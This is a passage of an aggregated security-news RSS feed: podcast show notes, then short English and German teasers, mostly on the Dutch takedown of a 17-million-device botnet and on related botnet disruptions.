- Claude reccovers Bitcoin wallet<br />
- an Instagram "Exploit"<br />
- Turn the plane around<br />
- The worms will continue<br />
- PAN-OS global protect vulnerability<br />
- The 1-Click Github token stealer<br />
- Data-nuking prompt injection<br />
- Turning Buses into spies<br />
- SymJack<br />
- NIST NVD mistakes, and how CNAs need to up their game<br />
<br />
Visit https://www.securityweekly.com/psw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/psw-929<br />
<br />
Chapters<br />
<br />
00:00 Security News Roundup<br />
02:51 SALTCON Insights and Reflections<br />
10:58 NIST Vulnerability Database Issues<br />
22:13 The Value of CVEs and Patching Strategies<br />
27:08 The Challenge of Open Source Vulnerabilities<br />
28:46 The Role of AI in Vulnerability Research<br />
30:20 The Patch Dilemma: Finding and Applying Fixes<br />
32:36 Vendor Incentives and Security Practices<br />
36:22 SaaS Solutions and Security Responsibilities<br />
38:34 The Future of AI in Software Security<br />
41:05 Vulnerabilities in Consumer Devices<br />
45:28 AI and Social Engineering Vulnerabilities<br />
50:34 Microsoft's Stance on Vulnerability Disclosure<br />
53:42 The BitLocker Bypass Controversy<br />
56:39 Vulnerability Disclosure and Microsoft's Response<br />
59:22 The Shadow Brokers and Historical Context<br />
01:01:07 Dutch Police and the IOT Botnet Shutdown<br />
01:04:40 Reflections on the Evolution of Hacking<br />
01:06:21 The First Documented Computer Hack for Profit<br />
01:14:43 Air Travel and Bluetooth Mishaps<br />
01:20:37 Bluetooth Vulnerabilities and Security Risks<br />
01:29:01 Accidental Discoveries in Tech<br />
01:32:28 Exploring Arduino and Tamper Protection<br />
01:33:30 Nightmare Eclipse and Secure Boot Vulnerabilities<br />
01:35:05 Impact of US Sanctions on China's Tech Innovation<br />
01:38:01 Challenges in Domestic Chip Manufacturing<br />
01:40:46 Nuclear Energy and Its Role in Future Power Needs<br />
01:43:41 Data Center Power Demands and Cooling Solutions<br />
01:48:05 Phishing Attacks and Cybersecurity Awareness<br />
01:49:46 Legislative Concerns Over Location Data Privacy<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch police, NCSC take down major botnet]]></title>
<description><![CDATA[A collaboration between the Dutch National Police and the National Cyber Security Centre (NCSC), has seen a large botnet being shut down.  In this operation, 200 servers were identified and addressed as well. These servers controlled millions of infected devices,…
Read more →
The post Dutch polic...]]></description>
<link>https://tsecurity.de/de/3571766/it-security-nachrichten/dutch-police-ncsc-take-down-major-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571766/it-security-nachrichten/dutch-police-ncsc-take-down-major-botnet/</guid>
<pubDate>Thu, 04 Jun 2026 09:36:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A collaboration between the Dutch National Police and the National Cyber Security Centre (NCSC), has seen a large botnet being shut down.  In this operation, 200 servers were identified and addressed as well. These servers controlled millions of infected devices,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/dutch-police-ncsc-take-down-major-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/dutch-police-ncsc-take-down-major-botnet/">Dutch police, NCSC take down major botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch police, NCSC take down major botnet]]></title>
<description><![CDATA[A collaboration between the Dutch National Police and the National Cyber Security Centre (NCSC), has seen a large botnet being shut down.  In this operation, 200 servers were identified and addressed as well. These servers controlled millions of infected devices, from computers to phones, and wer...]]></description>
<link>https://tsecurity.de/de/3571712/it-security-nachrichten/dutch-police-ncsc-take-down-major-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571712/it-security-nachrichten/dutch-police-ncsc-take-down-major-botnet/</guid>
<pubDate>Thu, 04 Jun 2026 09:07:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A collaboration between the Dutch National Police and the National Cyber Security Centre (NCSC), has seen a large botnet being shut down.  In this operation, 200 servers were identified and addressed as well. These servers controlled millions of infected devices, from computers to phones, and were used to carry out cyberattacks. A security researcher first [...]]]></content:encoded>
</item>
<item>
<title><![CDATA['You can no longer do things at human ​scale': Cisco releases AI agent botnet that works on behalf of your business]]></title>
<description><![CDATA[Cyberspace has become an AI battlefield, and Cisco wants in on the action.]]></description>
<link>https://tsecurity.de/de/3570258/it-nachrichten/you-can-no-longer-do-things-at-human-scale-cisco-releases-ai-agent-botnet-that-works-on-behalf-of-your-business/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570258/it-nachrichten/you-can-no-longer-do-things-at-human-scale-cisco-releases-ai-agent-botnet-that-works-on-behalf-of-your-business/</guid>
<pubDate>Wed, 03 Jun 2026 18:17:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cyberspace has become an AI battlefield, and Cisco wants in on the action.]]></content:encoded>
</item>
<item>
<title><![CDATA[Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO]]></title>
<description><![CDATA[FortiGuard Labs analyzes C0XMO, a new Gafgyt variant leveraging DD-WRT exploitation and multi-architecture propagation to expand IoT botnet infections.        This article has been indexed from FortiGuard Labs Threat Research Read the original article: Inside the Cross-Platform Propagation of a…
...]]></description>
<link>https://tsecurity.de/de/3569766/it-security-nachrichten/inside-the-cross-platform-propagation-of-a-new-gafgyt-variant-c0xmo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569766/it-security-nachrichten/inside-the-cross-platform-propagation-of-a-new-gafgyt-variant-c0xmo/</guid>
<pubDate>Wed, 03 Jun 2026 15:38:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>FortiGuard Labs analyzes C0XMO, a new Gafgyt variant leveraging DD-WRT exploitation and multi-architecture propagation to expand IoT botnet infections.        This article has been indexed from FortiGuard Labs Threat Research Read the original article: Inside the Cross-Platform Propagation of a…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/inside-the-cross-platform-propagation-of-a-new-gafgyt-variant-c0xmo/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/inside-the-cross-platform-propagation-of-a-new-gafgyt-variant-c0xmo/">Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Niederländische Behörden stoppen Botnetz mit 17 Millionen Geräten und Proxy-Infrastruktur]]></title>
<description><![CDATA[AMSTERDAM / LONDON (IT BOLTWISE) – Die niederländischen Strafverfolger haben ein Botnetz zerschlagen, das Berichten zufolge mindestens 17 Millionen kompromittierte Geräte für Angriffe missbrauchte. Laut den Behörden spielten dabei über 200 Server in den Niederlanden die Rolle einer zentralen Back...]]></description>
<link>https://tsecurity.de/de/3566261/it-security-nachrichten/niederlaendische-behoerden-stoppen-botnetz-mit-17-millionen-geraeten-und-proxy-infrastruktur/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566261/it-security-nachrichten/niederlaendische-behoerden-stoppen-botnetz-mit-17-millionen-geraeten-und-proxy-infrastruktur/</guid>
<pubDate>Tue, 02 Jun 2026 15:20:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-infrastructure.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-infrastructure.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-infrastructure-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-infrastructure-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-infrastructure-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-infrastructure-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-infrastructure-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">AMSTERDAM / LONDON (IT BOLTWISE) – Die niederländischen Strafverfolger haben ein Botnetz zerschlagen, das Berichten zufolge mindestens 17 Millionen kompromittierte Geräte für Angriffe missbrauchte. Laut den Behörden spielten dabei über 200 Server in den Niederlanden die Rolle einer zentralen Backend-Infrastruktur. In der Analyse rückt zudem die Proxy-Schiene in den Fokus, bei der kompromittierte Endgeräte als […]</p>
<div><a href="https://www.it-boltwise.de/niederlaendische-behoerden-stoppen-botnetz-mit-17-millionen-geraeten-und-proxy-infrastruktur.html">... den vollständigen Artikel <strong>»Niederländische Behörden stoppen Botnetz mit 17 Millionen Geräten und Proxy-Infrastruktur«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/niederlaendische-behoerden-stoppen-botnetz-mit-17-millionen-geraeten-und-proxy-infrastruktur.html">Niederländische Behörden stoppen Botnetz mit 17 Millionen Geräten und Proxy-Infrastruktur</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Niederländische Behörden stoppen Botnet mit bis zu 17 Mio. infizierten Geräten]]></title>
<description><![CDATA[AMSTERDAM / LONDON (IT BOLTWISE) – Niederländische Behörden haben ein Botnet zerschlagen, das Berichten zufolge rund 17 Millionen Geräte in einer zentral gesteuerten Infrastruktur missbrauchte. Über mehr als 200 Server in den Niederlanden lief die Backend-Plattform, bevor ein Teil davon sicherges...]]></description>
<link>https://tsecurity.de/de/3566067/it-security-nachrichten/niederlaendische-behoerden-stoppen-botnet-mit-bis-zu-17-mio-infizierten-geraeten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3566067/it-security-nachrichten/niederlaendische-behoerden-stoppen-botnet-mit-bis-zu-17-mio-infizierten-geraeten/</guid>
<pubDate>Tue, 02 Jun 2026 14:22:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-brennpunkt.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-brennpunkt.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-brennpunkt-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-brennpunkt-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-brennpunkt-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-brennpunkt-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/06/ai-botnet-takedown-proxy-brennpunkt-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">AMSTERDAM / LONDON (IT BOLTWISE) – Niederländische Behörden haben ein Botnet zerschlagen, das Berichten zufolge rund 17 Millionen Geräte in einer zentral gesteuerten Infrastruktur missbrauchte. Über mehr als 200 Server in den Niederlanden lief die Backend-Plattform, bevor ein Teil davon sichergestellt und später offline genommen wurde. Besonders brisant: Die Kampagne stand im Zusammenhang mit Proxy-Diensten, […]</p>
<div><a href="https://www.it-boltwise.de/niederlaendische-behoerden-stoppen-botnet-mit-bis-zu-17-mio-infizierten-geraeten.html">... den vollständigen Artikel <strong>»Niederländische Behörden stoppen Botnet mit bis zu 17 Mio. infizierten Geräten«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/niederlaendische-behoerden-stoppen-botnet-mit-bis-zu-17-mio-infizierten-geraeten.html">Niederländische Behörden stoppen Botnet mit bis zu 17 Mio. infizierten Geräten</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta AI hands over Instagram access, Dutch police dismantle botnet, RedHat packages backdoored]]></title>
<description><![CDATA[Meta AI hands over Instagram account access Dutch police dismantle huge botnet RedHat packages get backdoored Get the show notes here: https://cisoseries.com/meta-ai-hands-over-instagram-access-dutch-police-dismantle-botnet-redhat-packages-backdoored/ Huge thanks to our episode sponsor, Vanta You...]]></description>
<link>https://tsecurity.de/de/3565232/it-security-nachrichten/meta-ai-hands-over-instagram-access-dutch-police-dismantle-botnet-redhat-packages-backdoored/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565232/it-security-nachrichten/meta-ai-hands-over-instagram-access-dutch-police-dismantle-botnet-redhat-packages-backdoored/</guid>
<pubDate>Tue, 02 Jun 2026 09:35:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Meta AI hands over Instagram account access Dutch police dismantle huge botnet RedHat packages get backdoored Get the show notes here: https://cisoseries.com/meta-ai-hands-over-instagram-access-dutch-police-dismantle-botnet-redhat-packages-backdoored/ Huge thanks to our episode sponsor, Vanta Your team just added its 67th AI tool. And unfortunately, also…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/meta-ai-hands-over-instagram-access-dutch-police-dismantle-botnet-redhat-packages-backdoored/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/meta-ai-hands-over-instagram-access-dutch-police-dismantle-botnet-redhat-packages-backdoored/">Meta AI hands over Instagram access, Dutch police dismantle botnet, RedHat packages backdoored</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zero trust physical security needs trust decisions at the edge]]></title>
<description><![CDATA[In this interview with Help Net Security, Chuck Davis, VP, Global Information Security at Hikvision, explains how zero trust applies to physical security systems like cameras and door controllers. He breaks down how to make trust decisions at the edge without recreating old perimeter assumptions,...]]></description>
<link>https://tsecurity.de/de/3565022/it-security-nachrichten/zero-trust-physical-security-needs-trust-decisions-at-the-edge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3565022/it-security-nachrichten/zero-trust-physical-security-needs-trust-decisions-at-the-edge/</guid>
<pubDate>Tue, 02 Jun 2026 07:38:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this interview with Help Net Security, Chuck Davis, VP, Global Information Security at Hikvision, explains how zero trust applies to physical security systems like cameras and door controllers. He breaks down how to make trust decisions at the edge without recreating old perimeter assumptions, why these devices should be treated as IT assets, and what the Mirai botnet taught the industry. Davis also covers posture assessment for devices that cannot run standard agents, and … <a href="https://www.helpnetsecurity.com/2026/06/02/chuck-davis-hikvision-zero-trust-physical-security/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/02/chuck-davis-hikvision-zero-trust-physical-security/">Zero trust physical security needs trust decisions at the edge</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Police Dismantle Massive 17-Million-Device Botnet]]></title>
<description><![CDATA[Dutch authorities seized command-and-control servers tied to a botnet of infected computers, smartphones, and tablets that was allegedly used to power a residential proxy network and facilitate cybercrime.
The post Dutch Police Dismantle Massive 17-Million-Device Botnet appeared first on Security...]]></description>
<link>https://tsecurity.de/de/3563990/it-security-nachrichten/dutch-police-dismantle-massive-17-million-device-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563990/it-security-nachrichten/dutch-police-dismantle-massive-17-million-device-botnet/</guid>
<pubDate>Mon, 01 Jun 2026 20:07:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch authorities seized command-and-control servers tied to a botnet of infected computers, smartphones, and tablets that was allegedly used to power a residential proxy network and facilitate cybercrime.</p>
<p>The post <a href="https://www.securityweek.com/dutch-police-dismantle-massive-17-million-device-botnet/">Dutch Police Dismantle Massive 17-Million-Device Botnet</a> appeared first on <a href="https://www.securityweek.com/">SecurityWeek</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Dutch Police Dismantle Massive 17-Million-Device Botnet]]></title>
<description><![CDATA[Dutch authorities seized command-and-control servers tied to a botnet of infected computers, smartphones, and tablets that was allegedly used to power a residential proxy network and facilitate cybercrime. The post Dutch Police Dismantle Massive 17-Million-Device Botnet appeared first on Security...]]></description>
<link>https://tsecurity.de/de/3563987/it-security-nachrichten/dutch-police-dismantle-massive-17-million-device-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563987/it-security-nachrichten/dutch-police-dismantle-massive-17-million-device-botnet/</guid>
<pubDate>Mon, 01 Jun 2026 20:07:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dutch authorities seized command-and-control servers tied to a botnet of infected computers, smartphones, and tablets that was allegedly used to power a residential proxy network and facilitate cybercrime. The post Dutch Police Dismantle Massive 17-Million-Device Botnet appeared first on SecurityWeek.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/dutch-police-dismantle-massive-17-million-device-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/dutch-police-dismantle-massive-17-million-device-botnet/">Dutch Police Dismantle Massive 17-Million-Device Botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Botnet of More Than 17 Million Devices Dismantled]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: Authorities in the Netherlands said they dismantled a botnet that comprised more than 17 million devices and were managed by 200 servers in a joint operation by the police and the National Cyber Security Center. The action, announced Thursday...]]></description>
<link>https://tsecurity.de/de/3563486/it-security-nachrichten/botnet-of-more-than-17-million-devices-dismantled/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563486/it-security-nachrichten/botnet-of-more-than-17-million-devices-dismantled/</guid>
<pubDate>Mon, 01 Jun 2026 17:08:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: Authorities in the Netherlands said they dismantled a botnet that comprised more than 17 million devices and were managed by 200 servers in a joint operation by the police and the National Cyber Security Center. The action, announced Thursday, came about after a security researcher reported the sprawling network to authorities. The host infrastructure was located in the Netherlands. "The police then seized several botnet servers from a hosting provider for investigation," the NCSC said. "The botnet was taken offline by the provider because it was used for criminal purposes."
 
According to a report Thursday by the NL Times, the botnet was linked to ASOCKS, a Russia-based company that provides residential proxy services. These services cater to people and organizations who want to obscure their locations or identities by proxying their Internet traffic through third-party devices. Proxy services are often used for illicit or unethical purposes such as performing DDoS attacks, running botnet command-and-control servers, operating phishing operations, and scraping website content. [...] It's unclear how the 17 million devices controlled by the botnet taken down by the Dutch police came to be that way.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Botnet+of+More+Than+17+Million+Devices+Dismantled%3A+https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F06%2F01%2F0336226%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fit.slashdot.org%2Fstory%2F26%2F06%2F01%2F0336226%2Fbotnet-of-more-than-17-million-devices-dismantled%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://it.slashdot.org/story/26/06/01/0336226/botnet-of-more-than-17-million-devices-dismantled?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[17 million strong botnet of compromised devices dismantled by Dutch authorities]]></title>
<description><![CDATA[The botnet is theorized to be related to Asocks, with the possibility the proxy network has bitten the dust.]]></description>
<link>https://tsecurity.de/de/3563177/it-nachrichten/17-million-strong-botnet-of-compromised-devices-dismantled-by-dutch-authorities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3563177/it-nachrichten/17-million-strong-botnet-of-compromised-devices-dismantled-by-dutch-authorities/</guid>
<pubDate>Mon, 01 Jun 2026 15:17:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The botnet is theorized to be related to Asocks, with the possibility the proxy network has bitten the dust.]]></content:encoded>
</item>
<item>
<title><![CDATA[17 Millionen Zombies: Niederländische Polizei stoppt riesiges Botnetz]]></title>
<description><![CDATA[Den niederländischen Sicherheitsbehörden ist ein bedeutender Schlag gegen die Cyberkriminalität gelungen: Die Polizei und das Nationale Zentrum für Cybersicherheit (NCSC) konnten gemeinsam ein riesiges Botnetz außer Betrieb setzen.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3562848/it-security-nachrichten/17-millionen-zombies-niederlaendische-polizei-stoppt-riesiges-botnetz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562848/it-security-nachrichten/17-millionen-zombies-niederlaendische-polizei-stoppt-riesiges-botnetz/</guid>
<pubDate>Mon, 01 Jun 2026 13:38:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,159048.html"><img hspace="5" border="0" align="left" alt="Sicherheitslücke, Security, Trojaner, Virus, Schadsoftware, Cybersecurity, Botnetz, Botnet" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/84010.jpg"></a>
			Den niederländischen Sicherheitsbehörden ist ein bedeutender Schlag gegen die Cyberkriminalität gelungen: Die Polizei und das Nationale Zentrum für Cybersicherheit (NCSC) konnten gemeinsam ein riesiges Botnetz außer Betrieb setzen.			(<a href="https://winfuture.de/news,159048.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Niederländische Strafverfolger legen Botnet mit 17 Millionen Drohnen lahm | heise online]]></title>
<description><![CDATA[Ende vergangener Woche ist der niederländischen Polizei zusammen mit dem Nationalen Zentrum für Cybersicherheit (NCSC) des Landes ein Schlag gegen ein ...]]></description>
<link>https://tsecurity.de/de/3562689/it-security-nachrichten/niederlaendische-strafverfolger-legen-botnet-mit-17-millionen-drohnen-lahm-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562689/it-security-nachrichten/niederlaendische-strafverfolger-legen-botnet-mit-17-millionen-drohnen-lahm-heise-online/</guid>
<pubDate>Mon, 01 Jun 2026 12:37:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ende vergangener Woche ist der niederländischen Polizei zusammen mit dem Nationalen Zentrum für <b>Cybersicherheit</b> (NCSC) des Landes ein Schlag gegen ein ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Niederländische Strafverfolger legen Botnet mit 17 Millionen Drohnen lahm]]></title>
<description><![CDATA[Das niederländische NCSC und die Polizei haben ein Botnet mit 200 Servern und 17 Millionen infizierten Geräten ausgeknipst.]]></description>
<link>https://tsecurity.de/de/3562317/it-nachrichten/niederlaendische-strafverfolger-legen-botnet-mit-17-millionen-drohnen-lahm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562317/it-nachrichten/niederlaendische-strafverfolger-legen-botnet-mit-17-millionen-drohnen-lahm/</guid>
<pubDate>Mon, 01 Jun 2026 10:17:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das niederländische NCSC und die Polizei haben ein Botnet mit 200 Servern und 17 Millionen infizierten Geräten ausgeknipst.]]></content:encoded>
</item>
<item>
<title><![CDATA[Niederländische Strafverfolger legen Botnet mit 17 Millionen Drohnen lahm]]></title>
<description><![CDATA[Das niederländische NCSC und die Polizei haben ein Botnet mit 200 Servern und 17 Millionen infizierten Geräten ausgeknipst.]]></description>
<link>https://tsecurity.de/de/3562291/it-security-nachrichten/niederlaendische-strafverfolger-legen-botnet-mit-17-millionen-drohnen-lahm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562291/it-security-nachrichten/niederlaendische-strafverfolger-legen-botnet-mit-17-millionen-drohnen-lahm/</guid>
<pubDate>Mon, 01 Jun 2026 10:04:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das niederländische NCSC und die Polizei haben ein Botnet mit 200 Servern und 17 Millionen infizierten Geräten ausgeknipst.]]></content:encoded>
</item>
<item>
<title><![CDATA[CrowdStrike, Google, and Shadowserver Foundation disrupt Glassworm botnet]]></title>
<description><![CDATA[CrowdStrike has shared details of a coordinated operation used to disable the Glassworm botnet, which targets software developers and leverages open-source ecosystems to deploy malware. The CrowdStrike Counter Adversary Operations team, in partnership with Google and the Shadowserver Foundation, ...]]></description>
<link>https://tsecurity.de/de/3562285/it-security-nachrichten/crowdstrike-google-and-shadowserver-foundation-disrupt-glassworm-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562285/it-security-nachrichten/crowdstrike-google-and-shadowserver-foundation-disrupt-glassworm-botnet/</guid>
<pubDate>Mon, 01 Jun 2026 10:04:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CrowdStrike has shared details of a coordinated operation used to disable the Glassworm botnet, which targets software developers and leverages open-source ecosystems to deploy malware. The CrowdStrike Counter Adversary Operations team, in partnership with Google and the Shadowserver Foundation, took…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/crowdstrike-google-and-shadowserver-foundation-disrupt-glassworm-botnet/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/crowdstrike-google-and-shadowserver-foundation-disrupt-glassworm-botnet/">CrowdStrike, Google, and Shadowserver Foundation disrupt Glassworm botnet</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CrowdStrike, Google, and Shadowserver Foundation disrupt Glassworm botnet]]></title>
<description><![CDATA[CrowdStrike has shared details of a coordinated operation used to disable the Glassworm botnet, which targets software developers and leverages open-source ecosystems to deploy malware. The CrowdStrike Counter Adversary Operations team, in partnership with Google and the Shadowserver Foundation, ...]]></description>
<link>https://tsecurity.de/de/3562259/it-security-nachrichten/crowdstrike-google-and-shadowserver-foundation-disrupt-glassworm-botnet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562259/it-security-nachrichten/crowdstrike-google-and-shadowserver-foundation-disrupt-glassworm-botnet/</guid>
<pubDate>Mon, 01 Jun 2026 09:51:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[CrowdStrike has shared details of a coordinated operation used to disable the Glassworm botnet, which targets software developers and leverages open-source ecosystems to deploy malware. The CrowdStrike Counter Adversary Operations team, in partnership with Google and the Shadowserver Foundation, took down all four C2 centers of the Glassworm network on 26 May by disrupting all [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Botnetz zerschlagen: 17 Millionen Geräte heimlich als Proxy missbraucht]]></title>
<description><![CDATA[Gesteuert wurde das Botnetz über etwa 200 in den Niederlanden gehostete Server. Zu den infizierten Geräten zählen PCs, Smartphones und Router. (Botnet, Virus)]]></description>
<link>https://tsecurity.de/de/3562153/it-nachrichten/botnetz-zerschlagen-17-millionen-geraete-heimlich-als-proxy-missbraucht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3562153/it-nachrichten/botnetz-zerschlagen-17-millionen-geraete-heimlich-als-proxy-missbraucht/</guid>
<pubDate>Mon, 01 Jun 2026 09:02:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Gesteuert wurde das Botnetz über etwa 200 in den Niederlanden gehostete Server. Zu den infizierten Geräten zählen PCs, Smartphones und Router. (<a href="https://www.golem.de/specials/botnet/">Botnet</a>, <a href="https://www.golem.de/specials/virus/">Virus</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=209238&amp;page=1&amp;ts=1780297081" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Cyberangriffe: 17-Millionen-Botnet zerschlagen, neue Lücken aktiv - BornCity]]></title>
<description><![CDATA[Besonders brisant: Eine als CVE-2026-46204 registrierte Sicherheitslücke im SMBv3-Treiber von Windows 10, Windows 11 und Windows Server 2022. Mit ...]]></description>
<link>https://tsecurity.de/de/3561237/windows-server/cyberangriffe-17-millionen-botnet-zerschlagen-neue-luecken-aktiv-borncity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3561237/windows-server/cyberangriffe-17-millionen-botnet-zerschlagen-neue-luecken-aktiv-borncity/</guid>
